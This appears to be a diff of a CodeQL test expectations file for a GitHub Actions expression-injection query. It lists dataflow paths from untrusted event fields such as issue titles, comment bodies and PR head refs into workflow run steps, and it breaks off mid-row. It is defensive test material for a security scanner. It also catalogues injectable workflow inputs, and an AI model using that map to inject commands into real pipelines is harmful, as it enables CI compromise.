.github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | -| 